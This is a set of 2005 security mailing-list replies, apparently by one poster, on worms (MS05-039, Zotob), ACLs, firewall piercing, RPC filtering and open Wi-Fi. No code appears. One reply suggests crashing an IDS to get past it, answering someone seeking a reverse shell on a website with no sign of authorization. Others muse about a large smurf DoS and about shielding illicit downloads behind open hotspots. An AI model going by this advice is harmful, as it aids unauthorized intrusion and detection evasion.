On Thu, 15 Sep 2005, Williams, James K wrote: List: full-disclosure Subject:[Full-disclosure] NUL Character Evasion From: ju () heisec ! de Date: 2005-09-13 21:24:42 Thank you for the report. Computer Associates is currently investigating the issue (as it relates to CA products). Regards, kw Ken Williams ; Dir. Vuln Research Computer Associates ; 0xE2941985 Wow - that was fast. Perhaps we will start using CA for their response time! Ken, How long until this update hits your product? -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Who wrote Maximum Security?
On Sat, 3 Sep 2005, Pablo Fernandez wrote: Did you really like that book It is great background, though some of the tools he suggests are now dated. A good cover-to-cover read and allows you to think in terms of breaking existing security. I do suggest it. -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 On Sun, 04-09-2005 at 02:16 +0530, Joshua Russel wrote: Hi List, I read Maximum Security many years ago, when it was still rated a moderately good book on hacking as there weren't many books in the market. But this question nags me all the time. Who really wrote Maximum Security? Who is the Anonymous guy? I think, it's not much of an issue to reveal the identity now as hacking is not much of a derogatory term and many people use it freely. -- Joshua
Re: [Full-disclosure] No one else seeing the new MS05-039 worm yet?
On Mon, 29 Aug 2005, Vic Vandal wrote: I guess one can call it the Katrina worm until something better comes along. [...] - Sticks a long line of hosts resolving to broadcast address in: C:\WINNT\System32\Drivers\etc in hosts file. Do we still have huge smurf networks in the wild or has that pretty much been resolved? A well coordinated smurf from a bunch of hosts as feeding points could make a spectacular DoS. -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] RE: Example firewall script
On Tue, 30 Aug 2005, Rachael Treu Gomes wrote: There are also issues of what KIND of ACL to use and where to place them; Inbound or Outbound. In terms of the original question, the only difference between a good line item or a bad line item is whether or not the syntax is correct. Nicely put. The only difference between a good ACL and a bad ACL is whether or not its structure is properly designed and whether or not it's placed in the proper location. Again, nicely put. I might also suggest adding the idea that ACL logic and format follow with the same requirements for placement, and that overarching rules/guidelines regarding their structure and flow be evaluated on a case-by-case basis. It is incomplete and rife with exception, unfortunately, to decree that all ACLs and firewall feature sets be constructed in a particular manner without taking into account the particulars surrounding their respective deployments. Can anyone suggest a book which discusses ACL theories in different points of view and practical (?existing) applications? I would love to see documentation which addresses security and manageability as it relates to things like minimal ACL-line duplication and ingress+egress filtering techniques. Even in Cisco and 5xx-level networking courses, these issues are barely touched on. For traffic policies, much has been learned from this list and from practical experience. -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
RE: [Full-disclosure] RE: Example firewall script (iptables)
On Wed, 31 Aug 2005, Aditya Deshmukh wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bernardo Martín Sent: Tuesday, August 30, 2005 1:11 PM To: Full Disclosure Subject: RE: [Full-disclosure] RE: Example firewall script (iptables) In my first email i requested about bad example firewall script, in later mail i said that this script was to learn more so the scene isn't important because i'm looking for bad script in any scene If you are going to learn go to the Linux documentation project Website. There is a how-to Linux-firewalls that is a pretty good document Also there are some other documents breaking out of firewall The firewall piercing howto is a good read in concept here as well: http://www.ibiblio.org/pub/Linux/docs/HOWTO/other-formats/html_single/Firewall-Piercing.html It's a good lesson in covert channels :) -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005, womber wrote: On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez? Just looking for some feedback on this one... It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be responsible if they tracked it back to my AP? I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harassing call. Although I am not sure how that would be ruled either. I am not an attorney and this is not legal advice -- I have heard that there is case law supporting that unsecured wireless communication are public domain, just as wireless telephone conversations are not considered privileged by the Court. If this is the case, then anyone with default wireless router settings is a legal public hotspot. If there is an attorney on this list I would love to read the actual opinion of this (these) alleged case(s). Currently, this information must be considered hearsay. In the Portland area we have so many WAPs which are open that all we need to do is create wireless-bridging/routing points to route packets between overlapping wireless networks. In many cases, this wireless MAN would be faster point-to-point than going out the Internet and back to its destination. Since this MAN would be behind routers for the most part, bring your own firewall ;) -- Does anyone know of decent (cheap) low-power microcontrollers having 802.11 with I/O 5Mbit which support Linux? -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]
On Wed, 17 Aug 2005, Ron DuFresne wrote: Perhaps it does relate considering the above and considering that the unix world learned many of the evils of RCP services over ten years ago that seem to hit the M$ realm every few months, repeatedly... We used to call them rsploits when it was common in unix. Friends and I had a good chuckle when MS started repeating history, having rsploits of its own. I would love to deny all port 445 with layer-3 switches but this would be like blocking portmap and expecting NFS to still mount. What have we learned from the past that we can apply to our MS networks, since they have become a (un)necessary evil? How neutered does an MS workstation become if the RPC port is completely blocked from the outside? Perhaps mostly harmless ? What would it take to write an RPC filter to only accept RPCs which we actually care about? In addition, why is PnP even an RPC accessible from the outside (no, upnp is not a good reason)!? Most importantly, we need to eliminate the entire RPC attack vector in the future for Microsoft systems -- this is not the first MS rsploit and we will certainly see more. Your thoughts? -Eric
RE: [Full-disclosure] Disney Down?
On Tue, 16 Aug 2005 [EMAIL PROTECTED] wrote: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.CBQ Symantec: Win32.Zotob.E McAfee: exploit-dcomrpc Kaspersky: Net-Worm.Win32.Small.d The IRC server this worm uses is 72.20.27.115, #tbp -- does anyone know what port? Is the host down from the virus's DoS of the IRC server? -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Disney Down?
On Thu, 18 Aug 2005, pingywon wrote: Disney world CLOSED ! ..it can't be ..blame it on the terrorists and save face Mickey It must be 'cause of the hand-geometry biometric scanners they are using... someone must not have liked giving up their metrics ;) -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Insecure http pages referencing https form-actions.
On Wed, 10 Aug 2005, Leandro Meiners wrote: There was a lnnng discussion about this at [EMAIL PROTECTED] mailing list, check out the first mail at the archives at http://www.securityfocus.com/archive/107/402824/30/390/threaded There is even a Hall of shame at http://AmirHerzberg.com/shame.html. Wow... The hall of shame is great for a laugh. -- Thanks Leandro!
Re: [Full-disclosure] IDS or IPS detection and bypass
On Mon, 8 Aug 2005, Ahmad N wrote: I was trying to gain a reverse shell to a website the other day using a buffer overflow exploit, unfortunately it seems like they have some kind of buffer overflow exploit protection coming from an IDS or IPS so is there a way to find out what exactly is running, an IDS or IPS, and accordingly is there a way to bypass these systems If the IDS uses pcap (tcpdump et al) then you might find a way to crash the IDS. It seems that new IDS-crashing sploits come up often enough that perhaps your customer isn't completely up to date. Linuxsecurity.com has a decent article on testing IDS systems here: http://www.linuxsecurity.com/content/view/114356/65/.